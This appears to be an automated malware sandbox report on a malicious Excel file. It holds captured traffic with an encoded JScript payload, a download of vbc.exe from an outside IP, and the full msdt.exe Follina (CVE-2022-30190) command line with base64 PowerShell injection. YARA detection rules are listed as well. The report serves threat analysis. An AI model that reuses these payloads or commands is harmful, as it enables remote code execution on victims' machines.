                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 79 50 45 20 68 54 4d 4c 3e 0d 0a 0d 0a 3c 68 54 6d 4c 3e 0d 0a 0d 0a 3c 62 4f 44 79 3e 0d 0a 0d 0a 3c 73 63 52 69 70 54 20 0b 54 79 50 45 3d 22 54 65 78 74 2f 6a 73 43 52 69 70 74 2e 45 6e 63 6f 64 65 22 3e 0d 0a 0d 0a 2f 2f 2a 2a 73 54 41 72 54 20 65 6e 63 6f 64 65 2a 2a 0d 0a 0d 0a 23 40 7e 5e 53 31 51 41 41 41 3d 3d 40 23 40 26 40 23 40 26 5e 57 31 6c 59 62 57 09 20 74 4d 2b 57 50 7b 50 45 5c 6b 4f 48 72 7e 50 33 50 4a 55 39 50 29 72 50 2c 5f 7e 4a 26 72 39 4a 7e 50 33 7e 4a 2c 4a 7e 51 2c 4a 77 5e 09 39 6b 29 4d 67 36 72 50 7e 33 50 72 2f 4b 26 6d 72 7e 50 33 50 45 50 72 50 51 7e 72 4f 2f 30 72 4a 2c 50 5f 2c 45 4b 4a 2c 50 33 50 45 50 45 7e 33 50 45 73 7d 2e 4a 2c 50 51 7e 72 5a 32 45 7e 2c 5f 7e 4a 2c 45 2c 5f 7e 72 7a 68 62 44 72 50 2c 51 50 72 62 5c 4a 2c 50 51 7e 72 50 4a 2c 51 50 72 2d 4a 72 7e 51 50 72 71 44 7b 2e 32 45 7e 2c 5f 7e 4a 7e 2e 57 53 3f 6e 57 4b 4a 50 7e 51 2c 4a 2e 73 26 4a 7f 27 45 2c 50 33 50 4a 5b 62 26 50 4a 2c 5f 7e 4a 2c 4a 7e 51 2c 4a 71 3a 6d 53 6d 45 78 31 34 5c 2b 44 74 4b 4e 78 5a 47 55 44 2b 45 50 2c 51 50 72 36 4f 5c 72 50 50 51 7e 72 2b 55 45 72 7e 2c 5f 7e 72 50 72 50 5f 2c 4a 26 50 7b 7e 4a 7e 50 33 50 45 2e 4b 68 2f 7f 6f 57 4d 73 6b 5e 45 7e 50 33 50 72 2b 45 50 7e 51 2c 4a 78 4a 2c 7e 5f 2c 4a 2a 7a 44 5e 60 45 7e 33 50 45 71 41 61 76 5e 63 26 32 6f 60 42 5d 3f 48 64 4b 41 3a 20 4b 41 36 4f 20 7f 31 5a 4b 5b 71 09 6f 54 45 51 2c 5a 5f 6c 4d 54 58 25 51 2c 3b 43 29 44 59 58 25 33 42 69 50 77 25 52 21 6e 3a 3f 4f 49 26 55 54 60 2c 55 35 6b 59 32 73 52 31 36 31 37 2b 5d 4b 59 42 51 2c 3b 74 6c 4d 44 2a 52 5f 24 31 75 29 49 59 2a 52 5f 76 73 5d 36 74 41 29 2f 41 7f 63 6b 59 5d 72 67 6f 60 76 51 5d 6d 75 6c 22 44 32 63 51 45 6a 38 49 5c 31 5a 38 41 6d 30 2c 25 7d 6a 31 50 28 3b 46 4d 28 66 39 47 7d 3f 7a 4f 38 33 
77 59 5c 3f 29 78 38 70 67 33 5b 5a 31 7b 39 77 4e 43 28 47 21 6f 65 09 22 33 4a 2e 22 58 31 32 69 54 53 71 46 73 28 7f 78 73 6d 73 49 6f 7d 73 56 3b 6a 6f 49 39 3a 54 63 54 39 46 44 33 38 4d 58 39 28 28 24 5c 5e 55 35 57 28 78 6a 7a 4b 41 46 2d 50 62 2a 33 38 33 53 6b 4a 5a 7e 39 6d 4d 6f 48 6a 79 2e 21 26 66 5a 4c 70 79 74 34 6d 5e 31 73 5b 3b 2a 2e 28 68 56 4e 34 20 22 73 46 2e 38 68 39 7f 42 2f 43 09 74 6f 5e 26 22 34 4e 56 56 25 28 56 2e 63 5b 21 6a 58 38 6b 7e 42 28 78 5d 35 4e 5f 71 6f 6a 2e 78 5c 49 56 2c 66 34 73 36 2d 65 71 49 6a 28 54 7d 61 34 4d 60 47 6a 7f 6c 21 60 43 5d 58 28 33 44 28 50 5a 58 22 4e 5f 39 32 38 73 6d 6f 5e 33 6b 2f 5e 26 22 7a 6d 7f 58 09 71 56 77 21 22 58 58 71 6c 71 2a 54 71 41 2e 66 4a 41 56 45 39 6f 41 5a 6d 6b 7e 7f 65 3a 31 77 7d 58 5e 6f 4a 69 6c 74 38 7f 60 4c 71 5e 73 70 65 62 71 6f 4a 69 6c 74 50 7f 6a 50 60 4d 6f 4e 7d 55 41 59 31 58 7a 4f 6a 56 73 22 6d 38 49 47 5e 09 6a 47 26 2f 49 6f 7f 4c 4b 7f 23 2e 78 48 22 4d 31 26 38 68 58 5c 65 7f 22 69 34 5a 7d 32 38 56 6a 57 5c 2f 53 6b 43 43 22 54 31 66 47 37 53 2e 32 26 74 6b 57 7a 31 47 6a 3b 48 3a 32 58 4a 4e 70 63 64 22 6f 32 48 5a 4f 2b 65 3a 74 45 5c 28 34 56 28 72 53 6b 42 4d 6a 36 4e 4e 77 7d 23 60 39 48 6a 69 67 6d 5b 3a 78 25 64 3a 23 57 7d 55 71 2f 74 5a 53
                                                                                                                                                                                            Data Ascii: <!DOCTyPE hTML><hTmL><bODy><scRipT TyPE="Text/jsCRipt.Encode">//**sTArT encode**#@~^S1QAAA==@#@&@#@&^W1lYbW tM+WP{PE\kOHr~P3PJU9P)rP,_~J&r9J~P3~J,J~Q,Jw^9k)Mg6rP~3Pr/K&mr~P3PEPrPQ~rO/0rJ,P_,EKJ,P3PEPE~3PEs}.J,PQ~rZ2E~,_~J,E,_~rzhbDrP,QPrb\J,PQ~rPJ,QPr-Jr~QPrqD{.2E~,_~J~.WS?nWKJP~Q,J.s&J'E,P3PJ[b&PJ,_~J,J~Q,Jq:mSmEx14\+DtKNxZGUD+EP,QPr6O\rPPQ~r+UEr~,_~rPrP_,J&P{~J~P3PE.Kh/oWMsk^E~P3Pr+EP~Q,JxJ,~_,J*zD^`E~3PEqAav^c&2o`B]?HdKA: KA6O 1ZK[qoTEQ,Z_lMTX%Q,;C)DYX%3BiPw%R!n:?OI&UT`,U5kY2sR1617+]KYBQ,;tlMD*R_$1u)IY*R_vs]6tA)/AckY]rgo`vQ]mul"D2cQEj8I\1Z8Am0,%}j1P(;FM(f9G}?zO83wY\?)x8pg3[Z1{9wNC(G!oe"3J."X12iTSqFs(xsmsIo}sV;joI9:TcT9FD38MX9(($\^U5W(xjzKAF-Pb*383SkJZ~9mMoHjy.!&fZLpyt4m^1s[;*.(hVN4 "sF.8h9B/Cto^&"4NVV%(V.c[!jX8k~B(x]5N_qoj.x\IV,f4s6-eqIj(T}a4M`Gjl!`C]X(3D(PZX"N_928smo^3k/^&"zmXqVw!"XXqlq*TqA.fJAVE9oAZmk~e:1w}X^oJilt8`Lq^spebqoJiltPjP`MoN}UAY1XzOjVs"m8IG^jG&/IoLK#.xH"M1&8hX\e"i4Z}28VjW\/SkCC"T1fG7S.2&tkWz1Gj;H:2XJNpcd"o2HZO+e:tE\(4V(rSkBMj6NNw}#`9Hjigm[:x%d:#W}Uq/tZS
Jun 28, 2022 10:45:23.572566032 CEST  1381  IN  Data Raw: 41 7c 3a 59 22 4e 41 73 7a 23 3b 46 79 3a 21 2e 77 6a 5a 54 22 46 4b 44 58 6a 7f 58 33 38 33 53 79 5c 6b 6c 73 7f 41 6a 4c 6e 73 56 68 74 68 58 33 5e 6b 6c 56 28 4d 41 6b 6a 73 2c 46 39 4d 6a 69 6c 56 2e 39 35 71 36 64 28 3b 71 33 22 09 2a 79 72
                                                                                                                                                                                            Data Ascii: A|:Y"NAsz#;Fy:!.wjZT"FKDXjX383Sy\klsAjLnsVhthX3^klV(MAkjs,F9MjilV.95q6d(;q3"*yrV~#}3X95Fa ehtEt(4sqNYP[V,pJ#~X8 go`&\TS`}n1:goq;F;5qFo(;Ny\!V4} lG8&g!xhx'vQ]mubMD&W_vb*B#bb*+EP,Q,J%rP,_Przc zcR&Rcz JRRJ RJRRJ zcRJJ~PQ~rR zcEP,_~EczR &rPQP
Jun 28, 2022 10:45:23.572590113 CEST  1382  IN  Data Raw: 6b 61 4e 28 39 58 34 55 6d 7a 2e 4b 55 66 33 79 78 74 35 7b 52 44 57 7e 21 6f 21 70 53 78 38 64 2e 60 6e 34 4e 09 4d 09 29 77 49 24 3b 22 5d 6b 53 53 46 69 39 28 66 34 5e 58 26 58 46 26 5e 24 28 09 4b 2f 61 33 2c 3b 2c 77 70 2b 41 44 21 59 55 7d
                                                                                                                                                                                            Data Ascii: kaN(9X4Umz.KUf3yxt5{RDW~!o!pSx8d.`n4NM)wI$;"]kSSFi9(f4^X&XF&^$(K/a3,;,wp+AD!YU}BtGf;^eLHt*dV%GA.`!(qHdx0!pzrIOJU6}Lu\OAWSlqhj%Z\7;tHl1JI;!2s&1Ap^2\~FHAn}~i2XG;m1+pO8&%C9y[2~C[o_DIJrIN(_1Mw2oEO(jyAqpv\Y1qW1zu.%9TGD7:FW+K|bN_F"\B^Uv6LV]SV;P
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572613955 CEST1383INData Raw: 68 4f 4d 36 75 49 39 70 73 68 4b 31 2e 64 2a 5f 3b 58 21 5c 64 56 30 20 2d 4c 79 7c 78 2b 3b 2e 4f 34 46 39 5e 47 4c 34 2a 34 6a 7d 2c 7a 6a 7d 36 32 70 5f 31 57 21 7d 2f 24 31 43 77 2f 54 57 45 2d 66 49 5c 52 5a 2d 22 35 7a 4c 7c 56 2a 58 32 4b
                                                                                                                                                                                            Data Ascii: hOM6uI9pshK1.d*_;X!\dV0 -Ly|x+;.O4F9^GL4*4j},zj}62p_1W!}/$1Cw/TWE-fI\RZ-"5zL|V*X2K0pJrsMuilwn7it0Mml#}FgrDm;c0!zFJoZP11srzAl}1WoZqFk0(K$U%9+n:szw.0CtNt+faf|aUL4Zm3ewob6!8H/FF4\jl4s}3h06rL2):cKhk.~HC2Ejp6GW~q97E5hk}j[qVxWf/o;Fh+K1:0V\ss}A`\*
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572635889 CEST1385INData Raw: 7f 3a 4e 71 61 38 34 46 2b 78 64 56 33 5b 64 77 3a 48 30 55 45 6e 6f 2b 6b 76 2a 45 6c 30 2a 66 60 41 34 49 22 20 41 4d 73 56 56 7d 45 79 72 24 5c 65 70 21 33 32 2f 6f 6d 77 70 5c 21 33 6f 4a 56 26 6e 2e 41 71 4c 64 76 4e 42 4e 36 2a 4b 79 47 28
                                                                                                                                                                                            Data Ascii: :Nqa84F+xdV3[dw:H0UEno+kv*El0*f`A4I" AMsVV}Eyr$\ep!32/omwp\!3oJV&n.AqLdvNBN6*KyG(FKN$[kZk3jA(ejNc&$N956g[*,D%T*"jzHK&jW;)5tb54D4}sqIrNMrd:nDSn(/TVRnYK|6F\w4dSvcj$|bVEK8j%jmg3dA5fHXK:^AVR0C"GIKzWAX{(DBxj8ablN?d(`ppqb5LdwVtn(/Ni10,|sO5GF&RbPL
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572658062 CEST1386INData Raw: 55 3b 5a 56 33 4a 67 71 68 6a 65 6f 32 64 33 4d 72 56 4d 50 39 6a 24 41 48 79 53 71 7b 4c 28 46 2a 6f 5c 2f 09 09 4e 6f 6a 5e 56 28 68 2b 39 22 33 7a 39 30 7d 74 32 7b 53 6e 73 71 3f 34 6b 49 32 4d 7a 76 25 24 4b 76 62 2d 4c 5c 3a 29 5c 6c 73 44
                                                                                                                                                                                            Data Ascii: U;ZV3Jgqhjeo2d3MrVMP9j$AHySq{L(F*o\/Noj^V(h+9"3z90}t2{Snsq?4kI2Mzv%$Kvb-L\:)\lsD 9~pApj2 F3m_y1Kl4Hs5ZFK[x$w1:\OLyFFNVW)#`X.c.q29(qWd0*J;d,q?wqDo\mwwVSMr^9DkZi?2 )un%H"VrAb\WGUbnpXW%*qF.TK&8FCJ+~s\TPl4WlmVjI{l\OpZ4+4Jk9EHD4nBTtV7Flhf:.aw
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572679996 CEST1388INData Raw: 6a 41 57 58 5a 7e 34 53 09 7d 36 29 5a 2a 49 28 2d 7f 63 73 3a 28 71 61 47 42 37 2c 3b 63 78 78 2b 46 56 4b 6e 68 7f 7c 22 59 09 28 5a 63 74 5a 7d 4d 53 46 70 68 42 72 62 6c 2f 6a 6d 36 25 5c 21 5a 5c 6a 5c 60 28 2a 53 45 4f 7a 6f 2b 72 5e 50 3a
                                                                                                                                                                                            Data Ascii: jAWXZ~4S}6)Z*I(-cs:(qaGB7,;cxx+FVKnh|"Y(ZctZ}MSFphBrbl/jm6%\!Z\j\`(*SEOzo+r^P:q*hMA$t^%:+6V}25p.\}m3q[hj}y\p6|v1A0F2M55PM-."&Gk(+6}]L}2M)\Vl$kxF`ntsW95*wr&*y"}0s55L#V(.!Vb\ 90G%&/Tjj1Psp6:S-C~WuK*9$2&AF|;KZj6+?7&KqHWWnjr4N;(s0K.LD.:S
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572701931 CEST1389INData Raw: 41 6f 6f 47 62 50 5c 6f 77 24 31 77 55 53 6c 78 33 2d 4b 72 6e 55 5c 31 31 21 21 30 66 7e 35 4b 3a 63 73 71 73 5c 63 67 7d 25 26 63 7d 63 58 79 4a 5b 49 34 4b 71 75 3f 79 6d 44 35 21 2e 6b 78 28 6f 48 5b 63 57 71 73 35 56 7f 5f 24 30 60 72 54 7a
                                                                                                                                                                                            Data Ascii: AooGbP\ow$1wUSlx3-KrnU\11!!0f~5K:csqs\cg}%&c}cXyJ[I4Kqu?ymD5!.kx(oH[cWqs5V_$0`rTz6X93tU.2nxMZ!S;Io4?!Vna.{ .Z%F7,hiVxqn2^*CG%k&K*p47py53cb5f1+Wr0\oX]+x5}fb50AS+!.](^oC0XmUH4tz}\8+\NGs|1AFKKBnw!GXS$V.5nrdAEs"lyJ!.eWDW+yT3.yh$s:g;*s+jzu.
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572726965 CEST1390INData Raw: 5a 6a 68 22 73 57 43 26 73 70 34 42 23 52 21 32 5c 7a 28 2a 7a 4c 54 4f 38 4b 26 24 7f 36 6e 5e 30 5c 58 31 57 22 6a 2e 61 76 58 38 44 6f 48 58 09 74 28 5a 67 31 33 55 7f 7f 2a 5c 74 31 2e 6f 44 30 42 34 32 7f 77 62 74 2a 72 47 6f 6c 6c 32 56 7e
                                                                                                                                                                                            Data Ascii: Zjh"sWC&sp4B#R!2\z(*zLTO8K&$6n^0\X1W"j.avX8DoHXt(Zg13U*\t1.oD0B42wbt*rGoll2V~VsWw(KUqA"9tL5Tiz:)s99c\\X!)W1sWGofVG?1nB*2!yW-LN/bpU}3u;0B%IkyL(b0L#1}}f(:.MHi99a/H6Kl83+V*6k-KN525qY2nOXmmo+"SU2NjpqI8Vxkr52xhT/NMaY;}7w$t::(oN_O&j5%
                                                                                                                                                                                            Jun 28, 2022 10:45:23.574032068 CEST1392INData Raw: 5c 41 7a 21 39 32 45 62 2f 25 20 28 79 7e 70 69 6e 7a 30 77 6c 21 76 3b 6a 57 77 34 7a 28 44 7d 30 72 36 57 72 2a 20 6e 46 64 62 4a 26 74 28 4c 5a 53 4d 4d 35 66 38 63 61 68 53 53 4b 2b 6f 2a 56 7d 70 4d 79 6a 6f 31 72 50 36 74 21 56 59 61 48 2b
                                                                                                                                                                                            Data Ascii: \Az!92Eb/% (y~pinz0wl!v;jWw4z(D}0r6Wr* nFdbJ&t(LZSMM5f8cahSSK+o*V}pMyjo1rP6t!VYaH+3zMaD"9&!ITpOEs0nbvO+A\2t29C2:\~SnH/}6!&:&B$I0,kfmRotaBa+DLz/O\!.`tHn&0DkS5K`F.T++!mW8R*4a|REr~cah/Tv51"K{8^NSHU|z Z(oj|5IzmpHdo`%U!8]jh}4)Obo04Us}Zl($m/+c+r;At
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689332962 CEST1393INData Raw: 7a 58 70 5e 37 6a 3b 6e 2a 3f 48 47 49 55 7a 7d 46 6a 6c 55 49 64 44 56 09 4f 77 25 62 6d 70 3a 31 2b 48 4b 54 5c 4b 57 69 57 34 64 53 77 2a 31 44 4c 6c 59 74 3f 5a 5c 7f 6d 7f 47 5f 6e 57 35 44 47 31 38 55 35 3a 41 7d 48 35 4d 6c 5f 25 7d 2c 34
                                                                                                                                                                                            Data Ascii: zXp^7j;n*?HGIUz}FjlUIdDVOw%bmp:1+HKT\KWiW4dSw*1DLlYt?Z\mG_nW5DG18U5:A}H5Ml_%},4qUAef8/_D\vx.H_j}^8FVA1`X4h;aNZ%04whNw}8;"E1%2645z!jbzmKlZ6G]M!Xqo-pdWlY"cDC3j+#rT,y])!pF,nBU+K`;!o7F`3AsE),DL68dGCyTjg|5$i4NgD7Au3U1A5S(Afq1da7}1}soZTfDH2jz(


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49783
Destination IP: 172.245.119.48
Destination Port: 80
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jun 28, 2022 10:46:37.635595083 CEST | 11717 | OUT | GET /870/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 172.245.119.48
Connection: Keep-Alive
Jun 28, 2022 10:46:37.757875919 CEST | 11719 | IN | HTTP/1.1 200 OK
Date: Tue, 28 Jun 2022 08:46:37 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
Last-Modified: Tue, 28 Jun 2022 02:41:13 GMT
ETag: "6d600-5e278f84f0321"
Accept-Ranges: bytes
Content-Length: 448000
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


Target ID: 0
Start time: 10:44:27
Start date: 28/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Imagebase: 0x1130000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 13
Start time: 10:45:24
Start date: 28/06/2022
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'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'+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
Imagebase: 0x1210000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate

                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                            Start time:10:46:00
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
                                                                                                                                                                                            Imagebase:0x13d0000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:10:46:03
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
                                                                                                                                                                                            Imagebase:0xd50000
                                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                            Start time:10:46:09
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
                                                                                                                                                                                            Imagebase:0x13d0000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                            Start time:10:46:12
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
                                                                                                                                                                                            Imagebase:0xd50000
                                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:10:46:32
                                                                                                                                                                                            Start date:28/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
                                                                                                                                                                                            Imagebase:0x13d0000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            No disassembly